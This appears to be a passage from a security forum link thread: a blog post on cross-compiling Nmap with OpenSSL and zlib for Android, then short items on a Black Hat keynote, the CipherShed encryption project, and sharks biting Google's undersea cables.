I see many people trying to cross-compile Nmap with OpenSSL support. Since I did not document the OpenSSL part of the cross-compile, there are a lot of complicated ways people do it. For example, Gorjan Petrovski here: Umit project: Cross-compilation of a static Nmap with OpenSSL for Android. In short, compiling the whole Android tree is not necessary. You just need to use the same compiler for everything. I'm assuming you have the NDK installed and a standalone toolchain in your PATH.

For building zlib, I'm using the following snippet:

export CCARCH=arm-linux-androideabi
CC="${CCARCH}-gcc" ./configure --prefix=/sdcard/opt/zlib-1.2.8
make
make install

For building OpenSSL, I'm using the following snippet:

export CCARCH=arm-linux-androideabi
./Configure dist --prefix=/sdcard/opt/openssl-1.0.1i
make CC="${CCARCH}-gcc" AR="${CCARCH}-ar r" RANLIB="${CCARCH}-ranlib" LDFLAGS="-static"
make install

For building Nmap, I'm using the following snippet:

git clone https://github.com/kost/nmap-android.git
cd nmap-android
cp -a android ~/src/nmap-6.46/
cd ~/src/nmap-6.46/android
# (you have to edit the Makefile to adjust the NDK and OpenSSL paths)
make havendk

Note: If you plan to compile with OpenSSL support, you need to edit the Makefile before issuing make havendk in order to specify the OpenSSL path. You should have binaries in place after the build. You can strip them and transfer them to your Android device.
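The three snippets above share one pattern: every component is configured against the same standalone-toolchain compiler prefix, and only the install prefix and the way the compiler is passed differ. A minimal sketch that assembles those command lines for inspection (the paths, versions, and toolchain prefix are the ones from the post; nothing is actually compiled here):

```shell
#!/bin/sh
# The common pattern of the cross-compile recipe: one toolchain prefix
# (CCARCH) drives zlib, OpenSSL and Nmap alike. Values are taken from
# the post above; this script only composes the command lines, it does
# not invoke the ARM toolchain.
CCARCH=arm-linux-androideabi

# zlib passes the cross compiler via CC at configure time
ZLIB_CONF="CC=${CCARCH}-gcc ./configure --prefix=/sdcard/opt/zlib-1.2.8"

# OpenSSL configures generically, then gets the toolchain at make time
SSL_CONF="./Configure dist --prefix=/sdcard/opt/openssl-1.0.1i"
SSL_MAKE="make CC=${CCARCH}-gcc AR='${CCARCH}-ar r' RANLIB=${CCARCH}-ranlib LDFLAGS=-static"

printf '%s\n' "$ZLIB_CONF" "$SSL_CONF" "$SSL_MAKE"
```

The takeaway is the author's point that no full Android tree build is needed: as long as every `CC`, `AR`, and `RANLIB` resolves to the same `${CCARCH}-` prefixed tool, the pieces link together.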
Source: Nmap 6.46 on Android | k0st
  22. [h=2]Cybersecurity as Realpolitik[/h] Power exists to be used. Some wish for cyber safety, which they will not get. Others wish for cyber order, which they will not get. Some have the eye to discern cyber policies that are "the least worst thing;" may they fill the vacuum of wishful thinking. Keynote Transcript ... Link: https://www.blackhat.com/us-14/archives.html
  23. CipherShed

CipherShed on OSX

CipherShed is free (as in free-of-charge and free-speech) encryption software for keeping your data secure and private. It started as a fork of the now-discontinued TrueCrypt project. Learn more about how CipherShed works and the project behind it.

CipherShed is cross-platform: it will be available for Windows, Mac OS, and GNU/Linux. The CipherShed project is open source, meaning the program source code is available for anyone to view. We encourage everyone to examine and audit our code, as well as contribute new ideas and improvements. We have several methods of communication for anyone to ask questions, get support, and become involved in the project. For more detailed information about the project, including contributing code and building from source, please visit our technical wiki.

Link: https://ciphershed.org/
  24. [h=1]The Global Internet Is Being Attacked by Sharks, Google Confirms[/h]

By Will Oremus

Sharks' attraction to undersea fiber-optic cables has been well documented over the years.

The Internet is a series of tubes ... that are sometimes attacked by sharks. Reports of sharks biting the undersea cables that zip our data around the world date to at least 1987. That's when the New York Times reported that "sharks have shown an inexplicable taste for the new fiber-optic cables that are being strung along the ocean floor linking the United States, Europe, and Japan."

Now it seems Google is biting back. According to Network World's Brandon Butler, a Google product manager explained at a recent event that the company has taken to wrapping its trans-Pacific underwater cables in Kevlar to guard against shark bites. Google confirmed to me that its newest generation of undersea cables comes wrapped in special protective yarn and steel wire armor, and that the goal is to protect against cable cuts, including possible shark attacks. Here's an old video of what that looks like, in case you were wondering:

To digress for a moment, it's not clear that the coating Google is using is actually Kevlar, per se. A little searching on Google's own handy website reveals that the company actually holds a patent of its own for a material called "polyethylene protective yarn."

It makes sense that Google would be investing in better ways to protect transoceanic data cables. Over the years there have been several instances in which damage to undersea lines resulted in widespread disruptions of Internet service. Dependable network infrastructure has become increasingly essential to Google's business, which relies on ultra-fast transmissions of information between its data centers around the world.
On Monday, Google infrastructure czar Urs Holzle announced that the company is helping to build a new trans-Pacific cable system connecting the United States to Japan at speeds of up to 60 Tbps. "That's about 10 million times faster than your cable modem," Holzle noted. Google's partners on the project include China Mobile and SingTel.

Why are sharks attracted to undersea data cables? Unclear. Several outlets have pointed out that sharks can sense electromagnetic fields, so perhaps they're attracted by the current. Alternatively, a shark expert from Cal State-Long Beach suggested to Wired, they may just be curious. Anyone with a dual expertise in chondrichthyan behavior and electrical engineering is warmly invited to offer a more compelling explanation in the comments below.

Regardless, it's clear their powerful bites can cause real problems. Popular Science dredged up a 2009 UN Environmental Program report that includes the following rather convincing background information:

Fish, including sharks, have a long history of biting cables as identified from teeth embedded in cable sheathings. Barracuda, shallow- and deep-water sharks and others have been identified as causes of cable failure. Bites tend to penetrate the cable insulation, allowing the power conductor to ground with seawater.

Forget Google vs. Apple, Google vs. Amazon, and Google vs. Facebook. My new favorite tech rivalry is Google vs. shark.

Source: Shark attacks threaten Google's undersea Internet cables. (Video)